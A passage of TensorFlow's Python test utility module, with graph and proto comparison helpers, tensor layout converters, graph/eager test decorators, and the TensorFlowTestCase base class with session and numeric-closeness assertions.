from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
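# Illustrative sketch (added for clarity, not part of the original file): the
# expected_ops dict maps node names to op types, e.g. a placeholder named "x"
# shows up as op type "Placeholder".
#
#   with ops.Graph().as_default() as g:
#     array_ops.placeholder(dtypes.float32, name="x")
#     assert_ops_in_graph({"x": "Placeholder"}, g)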
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
      tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
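# Minimal self-check sketch (added, not part of the original file): applied to
# plain shape lists, the two helpers above invert each other, so no session or
# GPU is required to exercise them.
def _example_layout_roundtrip():
  nhwc_shape = [8, 224, 224, 3]        # batch, height, width, channels
  nchw_shape = NHWCToNCHW(nhwc_shape)  # -> [8, 3, 224, 224]
  assert NCHWToNHWC(nchw_shape) == nhwc_shape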
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
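# Illustrative sketch (added): the condition may be a boolean expression or a
# zero-argument callable evaluated when the test runs, e.g. skipping whenever
# portpicker failed to import above.
#
#   @skip_if(_portpicker_import_error)
#   def testNeedsPortpicker(self):
#     ...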
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
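# Illustrative sketch (added): decorating a test class copies every test* method
# into a "<name>WithCApi" variant that runs with the C API enabled.
#
#   @with_c_api
#   class MyOpTest(TensorFlowTestCase):
#     def testSomething(self):
#       ...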
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
    __unused__: Prevents silently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
          f(self, **kwargs)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
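# Illustrative sketch (added): the decorator must be applied with parentheses;
# the wrapped method then runs once under graph mode and once eagerly, and
# self.evaluate() works in both.
#
#   class AdditionTest(TensorFlowTestCase):
#     @run_in_graph_and_eager_modes()
#     def testOnesShape(self):
#       result = self.evaluate(array_ops.ones([2, 3]))
#       self.assertEqual((2, 3), result.shape)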
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
    able to pollute each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
    then compares them using self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
      self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
The numpy values of `tensors`.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
# CopyFrom() returns None, so copy into a fresh proto and keep that copy.
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
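# A typical use of checkedThread() inside a test method (hypothetical test
# code): any assertion failure raised inside the worker is re-raised when the
# thread is joined, so it fails the test instead of being silently swallowed.
#
#   def testConcurrentThing(self):
#     def worker():
#       self.assertEqual(1, 1)
#     t = self.checkedThread(target=worker)
#     t.start()
#     t.join()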
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
